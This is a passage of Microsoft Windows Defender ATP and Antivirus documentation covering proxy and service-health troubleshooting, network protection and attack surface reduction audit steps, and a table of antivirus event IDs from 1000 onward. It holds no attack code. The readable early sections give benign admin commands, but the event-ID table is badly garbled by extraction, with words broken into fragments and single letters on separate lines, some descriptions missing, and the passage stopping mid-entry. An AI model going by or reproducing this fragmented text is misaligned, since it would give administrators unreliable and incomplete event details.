If some UI elements or data is missing on Windows Defender Security Center it’s possible that proxy settings are
blocking it.
Make sure that *.securitycenter.windows.com is included the proxy whitelist.
NOTE
You must use the HTTPS protocol when adding the following endpoints.
Windows Defender ATP service shows event or error logs in the Event
Viewer
See the topic Review events and errors using Event Viewer for a list of event IDs that are reported by the Windows
Defender ATP service. The topic also contains troubleshooting steps for event errors.
Windows Defender ATP service fails to start after a reboot and shows
error 577
If onboarding machines successfully completes but Windows Defender ATP does not start after a reboot and
shows error 577, check that Windows Defender is not disabled by a policy.
For more information, see Ensure that Windows Defender Antivirus is not disabled by policy.
Known issues with regional formats

Date and time formats
There are some known issues with the time and date formats.
The following date formats are supported:
MM/dd/yyyy
dd/MM/yyyy
The following date and time formats are currently not supported:
Date format yyyy/MM/dd
Date format dd/MM/yy
Date format with yy. Will only show yyyy.
Time format HH:mm:ss is not supported (the 12 hour AM/PM format is not supported). Only the 24-hour
format is supported.
Use of comma to indicate thousand
Support of use of comma as a separator in numbers are not supported. Regions where a number is separated with
a comma to indicate a thousand, will only see the use of a dot as a separator. For example, 15,5K is displayed as
15.5K.
Windows Defender ATP tenant was automatically created in Europe

When you use Azure Security Center to monitor servers, a Windows Defender ATP tenant is automatically created.
The Windows Defender ATP data is stored in Europe by default.
Related topics
Review events and errors using Event Viewer
Check the Windows Defender Advanced Threat
Protection service health
Applies to:
The Service health provides information on the current status of the Window Defender ATP service. You'll be
able to verify that the service health is healthy or if there are current issues. If there are issues, you'll see details
related to the issue such as when the issue was detected, what the preliminary root cause is, and the expected
resolution time.
You'll also see information on historical issues that have been resolved and details such as the date and time when
the issue was resolved. When there are no issues on the service, you'll see a healthy status.
You can view details on the service health by clicking the tile from the Security operations dashboard or
selecting the Service health menu from the navigation pane.
The Service health details page has the following tabs:
Current status
Status history
Current status
The Current status tab shows the current state of the Windows Defender ATP service. When the service is
running smoothly a healthy service health is shown. If there are issues seen, the following service details are
shown to help you gain better insight about the issue:
Date and time for when the issue was detected
A short description of the issue
Update time
Summary of impact
Preliminary root cause
Next steps
Expected resolution time
Updates on the progress of an issue is reflected on the page as the issue gets resolved. You'll see updates on
information such as an updated estimate resolution time or next steps.
When an issue is resolved, it gets recorded in the Status history tab.
Status history
The Status history tab reflects all the historical issues that were seen and resolved. You'll see details of the
resolved issues along with the other information that were included while it was being resolved.
Related topic
View the Security operations dashboard
Applies to:
IT administrators
When you use Network protection you may encounter issues, such as:
Network protection blocks a website that is safe (false positive)
Network protection fails to block a suspicious or known malicious website (false negative)
There are four steps to troubleshooting these problems:
1. Confirm prerequisites
2. Use audit mode to test the rule
3. Add exclusions for the specified rule (for false positives)
Confirm prerequisites
Network protection will only work on devices with the following conditions:
Endpoints are running Windows 10 Enterprise edition, version 1709 or higher (also known as the Fall Creators
Update).
Endpoints are using Windows Defender Antivirus as the sole antivirus protection app. Using any other
antivirus app will cause Windows Defender AV to disable itself.
Real-time protection is enabled.
Cloud-delivered protection is enabled.
Audit mode is not enabled. Use Group Policy to set the rule to Disabled (value: 0).
Use audit mode

You can enable network protection in audit mode and then visit a website that we've created to demo the feature.
All website connections will be allowed by network protection but an event will be logged to indicate any
connection that would have been blocked if network protection was enabled.
1. Set network protection to Audit mode. powershell Set-MpPreference -EnableNetworkProtection AuditMode
2. Perform the connection activity that is causing an issue (for example, attempt to visit the site, or connect to the
IP address you do or don't want to block).
3. Review the network protection event logs to see if the feature would have blocked the connection if it had been
set to Enabled. > >If network protection is not blocking a connection that you are expecting it should block,
enable the feature.
Set-MpPreference -EnableNetworkProtection Enabled
Report a false positive or false negative

If you've tested the feature with the demo site and with audit mode, and network protection is working on pre-
configured scenarios, but is not working as expected for a specific connection, use the Windows Defender Security
Intelligence web-based submission form to report a false negative or false positive for network protection. With an
E5 subscription, you can also provide a link to any associated alert.
Collect diagnostic data for file submissions

When you report a problem with network protection, you are asked to collect and submit diagnostic data that can
be used by Microsoft support and engineering teams to help troubleshoot issues.
1. Open an elevated command prompt and change to the Windows Defender directory:
cd c:\program files\windows defender
2. Run this command to generate the diagnostic logs: mpcmdrun -getfiles
3. By default, they are saved to C:\ProgramData\Microsoft\Windows Defender\Support\MpSupportFiles.cab.
Attach the file to the submission form.
Related topics
Network protection
Troubleshoot attack surface reduction rules
Applies to:
When you use attack surface reduction rules you may encounter issues, such as:
A rule blocks a file, process, or performs some other action that it should not (false positive)
A rule does not work as described, or does not block a file or process that it should (false negative)
There are four steps to troubleshooting these problems:
1. Confirm prerequisites
2. Use audit mode to test the rule
3. Add exclusions for the specified rule (for false positives)
Confirm prerequisites
Attack surface reduction rules will only work on devices with the following conditions:
Endpoints are running Windows 10 Enterprise, version 1709 (also known as the Fall Creators Update).
Endpoints are using Windows Defender Antivirus as the sole antivirus protection app. Using any other antivirus
app will cause Windows Defender AV to disable itself.
Real-time protection is enabled.
Audit mode is not enabled. Use Group Policy to set the rule to Disabled (value: 0) as described in Enable attack
surface reduction rules.
If these pre-requisites have all been met, proceed to the next step to test the rule in audit mode.
Use audit mode to test the rule

You can visit the Windows Defender Testground website at demo.wd.microsoft.com to confirm attack surface
reduction rules are generally working for pre-configured scenarios and processes on a device, or you can use audit
mode, which enables rules for reporting only.
Follow these instructions in Use the demo tool to see how attack surface reduction rules work to test the specific
rule you are encountering problems with.
1. Enable audit mode for the specific rule you want to test. Use Group Policy to set the rule to Audit mode (value:
2) as described in Enable attack surface reduction rules. Audit mode allows the rule to report the file or process,
but will still allow it to run.
2. Perform the activity that is causing an issue (for example, open or execute the file or process that should be
blocked but is being allowed).
3. Review the attack surface reductio rule event logs to see if the rule would have blocked the file or process if the
rule had been set to Enabled.
>
If a rule is not blocking a file or process that you are expecting it should block, first check if audit mode is
enabled.
Audit mode may have been enabled for testing another feature, or by an automated PowerShell script, and
may not have been disabled after the tests were completed.
If you've tested the rule with the demo tool and with audit mode, and attack surface reduction rules are working on
pre-configured scenarios, but the rule is not working as expected, proceed to either of the following sections based
on your situation:
1. If the attack surface reduction rule is blocking something that it should not block (also known as a false
positive), you can first add an attack surface reduction rule exclusion.
2. If the attack surface reduction rule is not blocking something that it should block (also known as a false
negative), you can proceed immediately to the last step, collecting diagnostic data and submitting the issue to
us.
Add exclusions for a false positive

If the attack surface reduction rule is blocking something that it should not block (also known as a false positive),
you can add exclusions to prevent attack surface reduction rules from evaluating the excluded files or folders.
To add an exclusion, see Customize Attack surface reduction.
IMPORTANT
You can specify individual files and folders to be excluded, but you cannot specify individual rules. This means any files or
folders that are excluded will be excluded from all ASR rules.
Report a false positive or false negative

Use the Windows Defender Security Intelligence web-based submission form to report a false negative or false
positive for network protection. With an E5 subscription, you can also provide a link to any associated alert.
Collect diagnostic data for file submissions

When you report a problem with attack surface reduction rules, you are asked to collect and submit diagnostic data
that can be used by Microsoft support and engineering teams to help troubleshoot issues.
1. Open an elevated command prompt and change to the Windows Defender directory:
console cd c:\program files\windows defender
2. Run this command to generate the diagnostic logs: console mpcmdrun -getfiles
3. By default, they are saved to C:\ProgramData\Microsoft\Windows Defender\Support\MpSupportFiles.cab.
Attach the file to the submission form.
Related topics
2 minutes to read
Review event logs and error codes to troubleshoot
issues with Windows Defender Antivirus
Applies to:
If you encounter a problem with Windows Defender Antivirus, you can search the tables in this topic to find a
matching issue and potential solution.
The tables list:
Windows Defender Antivirus event IDs (these apply to both Windows 10 and Windows Server 2016)
Windows Defender Antivirus client error codes
Internal Windows Defender Antivirus client error codes (used by Microsoft during development and testing)
TIP
You can also visit the Windows Defender ATP demo website at demo.wd.microsoft.com to confirm the following features
are working:
Windows Defender Antivirus event IDs

Windows Defender Antivirus records event IDs in the Windows event log.
You can directly view the event log, or if you have a third-party security information and event management
(SIEM ) tool, you can also consume Windows Defender Antivirus client event IDs to review specific events and
errors from your endpoints.
The table in this section lists the main Windows Defender Antivirus event IDs and, where possible, provides
suggested solutions to fix or resolve the error.
To view a Windows Defender Antivirus event
1. Open Event Viewer.
2. In the console tree, expand Applications and Services Logs, then Microsoft, then Windows, then
Windows Defender Antivirus.
3. Double-click on Operational.
4. In the details pane, view the list of individual events to find your event.
5. Click the event to see specific details about an event in the lower pane, under the General and Details tabs.
EVENT ID: 1000
Symbolic name: MALWAREPROTECTION_SCAN_STARTED

Message: An antimalware scan started.
Description:
Scan
ID:
<ID
num
ber
of
the
rele
vant
scan
.>
Scan
Typ
e:
<Sc
an
type
>,
for
exa
mpl
e:
A
n
t
i
v
i
r
u
s
A
n
t
i
s
p
y
w
a
r
e
A
n
t
i
m
a
l
w
a
r
e
Scan
Para
met
ers:
<Sc
an
para
met
ers>
, for
exa
mpl
e:
F
u
l
l
s
c
a
n
Q
u
i
c
k
s
c
a
n
C
u
s
t
o
m
e
r
s
c
a
n
Scan
Res
ourc
es:
<Re
sour
ces
(suc
h as
files/
dire
ctori
es/B
HO)
that
wer
e
scan
ned.
>
User
:
<Do
mai
n>\
<Us
er>
EVENT ID: 1001
Symbolic name: MALWAREPROTECTION_SCAN_COMPLETED
Message: An antimalware scan finished.
Description:
Scan
ID:
<ID
num
ber
of
the
rele
vant
scan
.>
Scan
Typ
e:
<Sc
an
type
>,
for
exa
mpl
e:
A
n
t
i
v
i
r
u
s
A
n
t
i
s
p
y
w
a
r
e
A
n
t
i
m
a
l
w
a
r
e
Scan
Para
met
ers:
<Sc
an
para
met
ers>
, for
exa
mpl
e:
F
u
l
l
s
c
a
n
Q
u
i
c
k
s
c
a
n
C
u
s
t
o
m
e
r
s
c
a
n
User
:
<Do
mai
n>\
<Us
er>
Scan
Tim
e:
<Th
e
dura
tion
of a
scan
.>
EVENT ID: 1002
Symbolic name: MALWAREPROTECTION_SCAN_CANCELLED
Message: An antimalware scan was stopped before it finished.
Description:
Scan
ID:
<ID
num
ber
of
the
rele
vant
scan
.>
Scan
Typ
e:
<Sc
an
type
>,
for
exa
mpl
e:
A
n
t
i
v
i
r
u
s
A
n
t
i
s
p
y
w
a
r
e
A
n
t
i
m
a
l
w
a
r
e
Scan
Para
met
ers:
<Sc
an
para
met
ers>
, for
exa
mpl
e:
F
u
l
l
s
c
a
n
Q
u
i
c
k
s
c
a
n
C
u
s
t
o
m
e
r
s
c
a
n
User
:
<Do
mai
n>
<
User
>
Scan
Tim
e:
<Th
e
dura
tion
of a
scan
.>
EVENT ID: 1003
Symbolic name: MALWAREPROTECTION_SCAN_PAUSED
Message: An antimalware scan was paused.
Description:
Scan
ID:
<ID
num
ber
of
the
rele
vant
scan
.>
Scan
Typ
e:
<Sc
an
type
>,
for
exa
mpl
e:
A
n
t
i
v
i
r
u
s
A
n
t
i
s
p
y
w
a
r
e
A
n
t
i
m
a
l
w
a
r
e
Scan
Para
met
ers:
<Sc
an
para
met
ers>
, for
exa
mpl
e:
F
u
l
l
s
c
a
n
Q
u
i
c
k
s
c
a
n
C
u
s
t
o
m
e
r
s
c
a
n
User
:
<Do
mai
n>\
<Us
er>
EVENT ID: 1004
Symbolic name: MALWAREPROTECTION_SCAN_RESUMED

Message: An antimalware scan was resumed.
Description:
Scan
ID:
<ID
num
ber
of
the
rele
vant
scan
.>
Scan
Typ
e:
<Sc
an
type
>,
for
exa
mpl
e:
A
n
t
i
v
i
r
u
s
A
n
t
i
s
p
y
w
a
r
e
A
n
t
i
m
a
l
w
a
r
e
Scan
Para
met
ers:
<Sc
an
para
met
ers>
, for
exa
mpl
e:
F
u
l
l
s
c
a
n
Q
u
i
c
k
s
c
a
n
C
u
s
t
o
m
e
r
s
c
a
n
User
:
<Do
mai
n>\
<Us
er>
EVENT ID: 1005
Symbolic name: MALWAREPROTECTION_SCAN_FAILED
Message: An antimalware scan failed.
Description:
Scan
ID:
<ID
num
ber
of
the
rele
vant
scan
.>
Scan
Typ
e:
<Sc
an
type
>,
for
exa
mpl
e:
A
n
t
i
v
i
r
u
s
A
n
t
i
s
p
y
w
a
r
e
A
n
t
i
m
a
l
w
a
r
e
Scan
Para
met
ers:
<Sc
an
para
met
ers>
, for
exa
mpl
e:
F
u
l
l
s
c
a
n
Q
u
i
c
k
s
c
a
n
C
u
s
t
o
m
e
r
s
c
a
n
User
:
<Do
mai
n>\
<Us
er>
Erro
r
Cod
e:
<Err
or
cod
e>
Res
ult
cod
e
asso
ciate
d
with
thre
at
stat
us.
Stan
dard
HRE
SUL
T
valu
es.
Erro
r
Des
cript
ion:
<Err
or
desc
ripti
on>
Des
cript
ion
of
the
erro
r.
User action: The antivirus client encountered an error, and the current
scan has stopped. The scan might fail due to a client-side
issue. This event record includes the scan ID, type of scan
(Windows Defender Antivirus, antispyware, antimalware), scan
parameters, the user that started the scan, the error code,
and a description of the error. To troubleshoot this event:
1. Run the scan again.
2. If it fails in the same way, go to the Microsoft Support
site, enter the error number in the Search box to look
for the error code.
3. Contact Microsoft Technical Support.
EVENT ID: 1006
Symbolic name: MALWAREPROTECTION_MALWARE_DETECTED
Message: The antimalware engine found malware or other

potentially unwanted software.
Description: For more information please see the following:

Na
me:
<Th
reat
nam
e>
ID:
<Th
reat
ID>
Seve
rity:
<Se
verit
y>,
for
exa
mpl
e:
L
o
w
M
o
d
e
r
a
t
e
H
i
g
h
S
e
v
e
r
e
Cate
gory
:
<Ca
tego
ry
desc
ripti
on>
, for
exa
mpl
e,
any
thre
at
or
mal
war
e
type
.
Path
:
<Fil
e
path
>
Det
ecti
on
Orig
in:
<De
tecti
on
origi
n>,
for
exa
mpl
e:
U
n
k
n
o
w
n
L
o
c
a
l
c
o
m
p
u
t
e
r
N
e
t
w
o
r
k
s
h
a
r
e
I
n
t
e
r
n
e
t
I
n
c
o
m
i
n
g
t
r
a
f
f
i
c
O
u
t
g
o
i
n
g
t
r
a
f
f
i
c
Det
ecti
on
Typ
e:
<De
tecti
on
type
>,
for
exa
mpl
e:
H
e
u
r
i
s
t
i
c
s
G
e
n
e
r
i
c
C
o
n
c
r
e
t
e
D
y
n
a
m
i
c
s
i
g
n
a
t
u
r
e
Det
ecti
on
Sour
ce:
<De
tecti
on
sour
ce>
for
exa
mpl
e:
U
s
e
r
:
u
s
e
r
i
n
i
t
i
a
t
e
d
S
y
s
t
e
m
:
s
y
s
t
e
m
i
n
i
t
i
a
t
e
d
R
e
a
l
-
t
i
m
e
:
r
e
a
l
-
t
i
m
e
c
o
m
p
o
n
e
n
t
i
n
i
t
i
a
t
e
d
I
O
A
V
:
I
E
D
o
w
n
l
o
a
d
s
a
n
d
O
u
t
l
o
o
k
E
x
p
r
e
s
s
A
t
t
a
c
h
m
e
n
t
s
i
n
i
t
i
a
t
e
d
N
I
S
:
N
e
t
w
o
r
k
i
n
s
p
e
c
t
i
o
n
s
y
s
t
e
m
I
E
P
R
O
T
E
C
T
:
I
E
-
I
E
x
t
e
n
s
i
o
n
V
a
l
i
d
a
t
i
o
n
;
t
h
i
s
p
r
o
t
e
c
t
s
a
g
a
i
n
s
t
m
a
l
i
c
i
o
u
s
w
e
b
p
a
g
e
c
o
n
t
r
o
l
s
E
a
r
l
y
L
a
u
n
c
h
A
n
t
i
m
a
l
w
a
r
e
(
E
L
A
M
)
.
T
h
i
s
i
n
c
l
u
d
e
s
m
a
l
w
a
r
e
d
e
t
e
c
t
e
d
b
y
t
h
e
b
o
o
t
s
e
q
u
e
n
c
e
R
e
m
o
t
e
a
t
t
e
s
t
a
t
i
o
n
Anti
mal
war
e
Scan
Inte
rfac
e
(AM
SI).
Prim
arily
use
d to
prot
ect
scrip
ts
(PS,
VBS)
,
tho
ugh
it
can
be
invo
ked
by
thir
d
parti
es
as
well.
UAC
Stat
us:
<St
atus
>
User
:
<Do
mai
n>\
<Us
er>
Proc
ess
Na
me:
<Pr
oces
s in
the
PID
>
Sign
atur
e
Vers
ion:
<De
finiti
on
versi
on>
Engi
ne
Vers
ion:
<An
tima
lwar
e
Engi
ne
versi
on>
EVENT ID: 1007
Symbolic name: MALWAREPROTECTION_MALWARE_ACTION_TAKEN
Message: The antimalware platform performed an action to

protect your system from malware or other potentially
unwanted software.
Description: Windows Defender Antivirus has taken action to protect this

machine from malware or other potentially unwanted
software. For more information please see the following:
User
:
<Do
mai
n>\
<Us
er>
Na
me:
<Th
reat
nam
e>
ID:
<Th
reat
ID>
Seve
rity:
<Se
verit
y>,
for
exa
mpl
e:
L
o
w
M
o
d
e
r
a
t
e
H
i
g
h
S
e
v
e
r
e
Cate
gory
:
<Ca
tego
ry
desc
ripti
on>
, for
exa
mpl
e,
any
thre
at
or
mal
war
e
type
.
Acti
on:
<Ac
tion
>,
for
exa
mpl
e:
C
l
e
a
n
:
T
h
e
r
e
s
o
u
r
c
e
w
a
s
c
l
e
a
n
e
d
Q
u
a
r
a
n
t
i
n
e
:
T
h
e
r
e
s
o
u
r
c
e
w
a
s
q
u
a
r
a
n
t
i
n
e
d
R
e
m
o
v
e
:
T
h
e
r
e
s
o
u
r
c
e
w
a
s
d
e
l
e
t
e
d
A
l
l
o
w
:
T
h
e
r
e
s
o
u
r
c
e
w
a
s
a
l
l
o
w
e
d
t
o
e
x
e
c
u
t
e
/
e
x
i
s
t
U
s
e
r
d
e
f
i
n
e
d
:
U
s
e
r
d
e
f
i
n
e
d
a
c
t
i
o
n
w
h
i
c
h
i
s
n
o
r
m
a
l
l
y
o
n
e
f
r
o
m
t
h
i
s
l
i
s
t
o
f
a
c
t
i
o
n
s
t
h
a
t
t
h
e
u
s
e
r
h
a
s
s
p
e
c
i
f
i
e
d
N
o
a
c
t
i
o
n
:
N
o
a
c
t
i
o
n
B
l
o
c
k
:
T
h
e
r
e
s
o
u
r
c
e
w
a
s
b
l
o
c
k
e
d
f
r
o
m
e
x
e
c
u
t
i
n
g
Stat
us:
<St
atus
>
Sign
atur
e
Vers
ion:
<De
finiti
on
versi
on>
Engi
ne
Vers
ion:
<An
tima
lwar
e
Engi
ne
versi
on>
EVENT ID: 1008
Symbolic name: MALWAREPROTECTION_MALWARE_ACTION_FAILED
Message: The antimalware platform attempted to perform an

action to protect your system from malware or other
potentially unwanted software, but the action failed.
Description: Windows Defender Antivirus has encountered an error when

taking action on malware or other potentially unwanted
software. For more information please see the following:
User
:
<Do
mai
n>\
<Us
er>
Na
me:
<Th
reat
nam
e>
ID:
<Th
reat
ID>
Seve
rity:
<Se
verit
y>,
for
exa
mpl
e:
L
o
w
M
o
d
e
r
a
t
e
H
i
g
h
S
e
v
e
r
e
Cate
gory
:
<Ca
tego
ry
desc
ripti
on>
, for
exa
mpl
e,
any
thre
at
or
mal
war
e
type
.
Path
:
<Fil
e
path
>
Acti
on:
<Ac
tion
>,
for
exa
mpl
e:
C
l
e
a
n
:
T
h
e
r
e
s
o
u
r
c
e
w
a
s
c
l
e
a
n
e
d
Q
u
a
r
a
n
t
i
n
e
:
T
h
e
r
e
s
o
u
r
c
e
w
a
s
q
u
a
r
a
n
t
i
n
e
d
R
e
m
o
v
e
:
T
h
e
r
e
s
o
u
r
c
e
w
a
s
d
e
l
e
t
e
d
A
l
l
o
w
:
T
h
e
r
e
s
o
u
r
c
e
w
a
s
a
l
l
o
w
e
d
t
o
e
x
e
c
u
t
e
/
e
x
i
s
t
U
s
e
r
d
e
f
i
n
e
d
:
U
s
e
r
d
e
f
i
n
e
d
a
c
t
i
o
n
w
h
i
c
h
i
s
n
o
r
m
a
l
l
y
o
n
e
f
r
o
m
t
h
i
s
l
i
s
t
o
f
a
c
t
i
o
n
s
t
h
a
t
t
h
e
u
s
e
r
h
a
s
s
p
e
c
i
f
i
e
d
N
o
a
c
t
i
o
n
:
N
o
a
c
t
i
o
n
B
l
o
c
k
:
T
h
e
r
e
s
o
u
r
c
e
w
a
s
b
l
o
c
k
e
d
f
r
o
m
e
x
e
c
u
t
i
n
g
Erro
r
Cod
e:
<Err
or
cod
e>
Res
ult
cod
e
asso
ciate
d
with
thre
at
stat
us.
Stan
dard
HRE
SUL
T
valu
es.
Erro
r
Des
cript
ion:
<Err
or
desc
ripti
on>
Des
cript
ion
of
the
erro
r.
Stat
us:
<St
atus
>
Sign
atur
e
Vers
ion:
<De
finiti
on
versi
on>
Engi
ne
Vers
ion:
<An
tima
lwar
e
Engi
ne
versi
on>
EVENT ID: 1009
Symbolic name: MALWAREPROTECTION_QUARANTINE_RESTORE
Message: The antimalware platform restored an item from

quarantine.
Description: Windows Defender Antivirus has restored an item from

quarantine. For more information please see the following:
Na
me:
<Th
reat
nam
e>
ID:
<Th
reat
ID>
Seve
rity:
<Se
verit
y>,
for
exa
mpl
e:
L
o
w
M
o
d
e
r
a
t
e
H
i
g
h
S
e
v
e
r
e
Cate
gory
:
<Ca
tego
ry
desc
ripti
on>
, for
exa
mpl
e,
any
thre
at
or
mal
war
e
type
.
Path
:
<Fil
e
path
>
User
:
<Do
mai
n>\
<Us
er>
Sign
atur
e
Vers
ion:
<De
finiti
on
versi
on>
Engi
ne
Vers
ion:
<An
tima
lwar
e
Engi
ne
versi
on>
EVENT ID: 1010

Symbolic name: MALWAREPROTECTION_QUARANTINE_RESTORE_FAILED
Message: The antimalware platform could not restore an item

from quarantine.
Description: Windows Defender Antivirus has encountered an error trying

to restore an item from quarantine. For more information
please see the following:
Na
me:
<Th
reat
nam
e>
ID:
<Th
reat
ID>
Seve
rity:
<Se
verit
y>,
for
exa
mpl
e:
L
o
w
M
o
d
e
r
a
t
e
H
i
g
h
S
e
v
e
r
e
Cate
gory
:
<Ca
tego
ry
desc
ripti
on>
, for
exa
mpl
e,
any
thre
at
or
mal
war
e
type
.
Path
:
<Fil
e
path
>
User
:
<Do
mai
n>\
<Us
er>
Erro
r
Cod
e:
<Err
or
cod
e>
Res
ult
cod
e
asso
ciate
d
with
thre
at
stat
us.
Stan
dard
HRE
SUL
T
valu
es.
Erro
r
Des
cript
ion:
<Err
or
desc
ripti
on>
Des
cript
ion
of
the
erro
r.
Sign
atur
e
Vers
ion:
<De
finiti
on
versi
on>
Engi
ne
Vers
ion:
<An
tima
lwar
e
Engi
ne
versi
on>
EVENT ID: 1011
Symbolic name: MALWAREPROTECTION_QUARANTINE_DELETE
Message: The antimalware platform deleted an item from

quarantine.
Description: Windows Defender Antivirus has deleted an item from

quarantine.
For more information please see the following:
Na
me:
<Th
reat
nam
e>
ID:
<Th
reat
ID>
Seve
rity:
<Se
verit
y>,
for
exa
mpl
e:
L
o
w
M
o
d
e
r
a
t
e
H
i
g
h
S
e
v
e
r
e
Cate
gory
:
<Ca
tego
ry
desc
ripti
on>
, for
exa
mpl
e,
any
thre
at
or
mal
war
e
type
.
Path
:
<Fil
e
path
>
User
:
<Do
mai
n>\
<Us
er>
Sign
atur
e
Vers
ion:
<De
finiti
on
versi
on>
Engi
ne
Vers
ion:
<An
tima
lwar
e
Engi
ne
versi
on>
EVENT ID: 1012
Symbolic name: MALWAREPROTECTION_QUARANTINE_DELETE_FAILED
Message: The antimalware platform could not delete an item

from quarantine.

to delete an item from quarantine. For more information
please see the following:
Na
me:
<Th
reat
nam
e>
ID:
<Th
reat
ID>
Seve
rity:
<Se
verit
y>,
for
exa
mpl
e:
L
o
w
M
o
d
e
r
a
t
e
H
i
g
h
S
e
v
e
r
e
Cate
gory
:
<Ca
tego
ry
desc
ripti
on>
, for
exa
mpl
e,
any
thre
at
or
mal
war
e
type
.
Path
:
<Fil
e
path
>
User
:
<Do
mai
n>\
<Us
er>
Erro
r
Cod
e:
<Err
or
cod
e>
Res
ult
cod
e
asso
ciate
d
with
thre
at
stat
us.
Stan
dard
HRE
SUL
T
valu
es.
Erro
r
Des
cript
ion:
<Err
or
desc
ripti
on>
Des
cript
ion
of
the
erro
r.
Sign
atur
e
Vers
ion:
<De
finiti
on
versi
on>
Engi
ne
Vers
ion:
<An
tima
lwar
e
Engi
ne
versi
on>
EVENT ID: 1013
Symbolic name: MALWAREPROTECTION_MALWARE_HISTORY_DELETE
Message: The antimalware platform deleted history of malware

and other potentially unwanted software.
Description: Windows Defender Antivirus has removed history of malware

Tim
e:
The
time
whe
n
the
eve
nt
occu
rred,
for
exa
mpl
e
whe
n
the
hist
ory
is
pur
ged.
Not
e
that
this
para
met
er is
not
use
d in
thre
at
eve
nts
so
that
ther
e is
no
conf
usio
n
rega
rdin
g
whe
ther
it is
rem
edia
tion
time
or
infec
tion
time
. For
thos
e,
we
spec
ifical
ly
call
the
m
as
Acti
on
Tim
e or
Det
ecti
on
Tim
e.
User
:
<Do
mai
n>\
<Us
er>
EVENT ID: 1014
Symbolic name: MALWAREPROTECTION_MALWARE_HISTORY_DELETE_FA

ILED
Message: The antimalware platform could not delete history of malware


to remove history of malware and other potentially
unwanted software.
Tim
e:
The
time
whe
n
the
eve
nt
occu
rred,
for
exa
mpl
e
whe
n
the
hist
ory
is
pur
ged.
Not
e
that
this
para
met
er is
not
use
d in
thre
at
eve
nts
so
that
ther
e is
no
conf
usio
n
rega
rdin
g
whe
ther
it is
rem
edia
tion
time
or
infec
tion
time
. For
thos
e,
we
spec
ifical
ly
call
the
m
as
Acti
on
Tim
e or
Det
ecti
on
Tim
e.
User
:
<Do
mai
n>\
<Us
er>
Erro
r
Cod
e:
<Err
or
cod
e>
Res
ult
cod
e
asso
ciate
d
with
thre
at
stat
us.
Stan
dard
HRE
SUL
T
valu
es.
Erro
r
Des
cript
ion:
<Err
or
desc
ripti
on>
Des
cript
ion
of
the
erro
r.
EVENT ID: 1015
Symbolic name: MALWAREPROTECTION_BEHAVIOR_DETECTED
Message: The antimalware platform detected suspicious behavior.
Description: Windows Defender Antivirus has detected a suspicious

behavior.
Na
me:
<Th
reat
nam
e>
ID:
<Th
reat
ID>
Seve
rity:
<Se
verit
y>,
for
exa
mpl
e:
L
o
w
M
o
d
e
r
a
t
e
H
i
g
h
S
e
v
e
r
e
Cate
gory
:
<Ca
tego
ry
desc
ripti
on>
, for
exa
mpl
e,
any
thre
at
or
mal
war
e
type
.
Path
:
<Fil
e
path
>
Det
ecti
on
Orig
in:
<De
tecti
on
origi
n>,
for
exa
mpl
e:
U
n
k
n
o
w
n
L
o
c
a
l
c
o
m
p
u
t
e
r
N
e
t
w
o
r
k
s
h
a
r
e
I
n
t
e
r
n
e
t
I
n
c
o
m
i
n
g
t
r
a
f
f
i
c
O
u
t
g
o
i
n
g
t
r
a
f
f
i
c
Det
ecti
on
Typ
e:
<De
tecti
on
type
>,
for
exa
mpl
e:
H
e
u
r
i
s
t
i
c
s
G
e
n
e
r
i
c
C
o
n
c
r
e
t
e
D
y
n
a
m
i
c
s
i
g
n
a
t
u
r
e
Det
ecti
on
Sour
ce:
<De
tecti
on
sour
ce>
for
exa
mpl
e:
U
s
e
r
:
u
s
e
r
i
n
i
t
i
a
t
e
d
S
y
s
t
e
m
:
s
y
s
t
e
m
i
n
i
t
i
a
t
e
d
R
e
a
l
-
t
i
m
e
:
r
e
a
l
-
t
i
m
e
c
o
m
p
o
n
e
n
t
i
n
i
t
i
a
t
e
d
I
O
A
V
:
I
E
D
o
w
n
l
o
a
d
s
a
n
d
O
u
t
l
o
o
k
E
x
p
r
e
s
s
A
t
t
a
c
h
m
e
n
t
s
i
n
i
t
i
a
t
e
d
N
I
S
:
N
e
t
w
o
r
k
i
n
s
p
e
c
t
i
o
n
s
y
s
t
e
m
I
E
P
R
O
T
E
C
T
:
I
E
-
I
E
x
t
e
n
s
i
o
n
V
a
l
i
d
a
t
i
o
n
;
t
h
i
s
p
r
o
t
e
c
t
s
a
g
a
i
n
s
t
m
a
l
i
c
i
o
u
s
w
e
b
p
a
g
e
c
o
n
t
r
o
l
s
E
a
r
l
y
L
a
u
n
c
h
A
n
t
i
m
a
l
w
a
r
e
(
E
L
A
M
)
.
T
h
i
s
i
n
c
l
u
d
e
s
m
a
l
w
a
r
e
d
e
t
e
c
t
e
d
b
y
t
h
e
b
o
o
t
s
e
q
u
e
n
c
e
R
e
m
o
t
e
a
t
t
e
s
t
a
t
i
o
n
Anti
mal
war
e
Scan
Inte
rfac
e
(AM
SI).
Prim
arily
use
d to
prot
ect
scrip
ts
(PS,
VBS)
,
tho
ugh
it
can
be
invo
ked
by
thir
d
parti
es
as
well.
UAC
Stat
us:
<St
atus
>
User
:
<Do
mai
n>\
<Us
er>
Proc
ess
Na
me:
<Pr
oces
s in
the
PID
>
Sign
atur
e ID:
Enu
mer
atio
n
mat
chin
g
seve
rity.
Sign
atur
e
Vers
ion:
<De
finiti
on
versi
on>
Engi
ne
Vers
ion:
<An
tima
lwar
e
Engi
ne
versi
on>
Fidel
ity
Lab
el:
Targ
et
File
Na
me:
<Fil
e
nam
e>
Na
me
of
the
file.
EVENT ID: 1116
Symbolic name: MALWAREPROTECTION_STATE_MALWARE_DETECTED
Message: The antimalware platform detected malware or other

Description: Windows Defender Antivirus has detected malware or other

Na
me:
<Th
reat
nam
e>
ID:
<Th
reat
ID>
Seve
rity:
<Se
verit
y>,
for
exa
mpl
e:
L
o
w
M
o
d
e
r
a
t
e
H
i
g
h
S
e
v
e
r
e
Cate
gory
:
<Ca
tego
ry
desc
ripti
on>
, for
exa
mpl
e,
any
thre
at
or
mal
war
e
type
.
Path
:
<Fil
e
path
>
Det
ecti
on
Orig
in:
<De
tecti
on
origi
n>,
for
exa
mpl
e:
U
n
k
n
o
w
n
L
o
c
a
l
c
o
m
p
u
t
e
r
N
e
t
w
o
r
k
s
h
a
r
e
I
n
t
e
r
n
e
t
I
n
c
o
m
i
n
g
t
r
a
f
f
i
c
O
u
t
g
o
i
n
g
t
r
a
f
f
i
c
Det
ecti
on
Typ
e:
<De
tecti
on
type
>,
for
exa
mpl
e:
H
e
u
r
i
s
t
i
c
s
G
e
n
e
r
i
c
C
o
n
c
r
e
t
e
D
y
n
a
m
i
c
s
i
g
n
a
t
u
r
e
Det
ecti
on
Sour
ce:
<De
tecti
on
sour
ce>
for
exa
mpl
e:
U
s
e
r
:
u
s
e
r
i
n
i
t
i
a
t
e
d
S
y
s
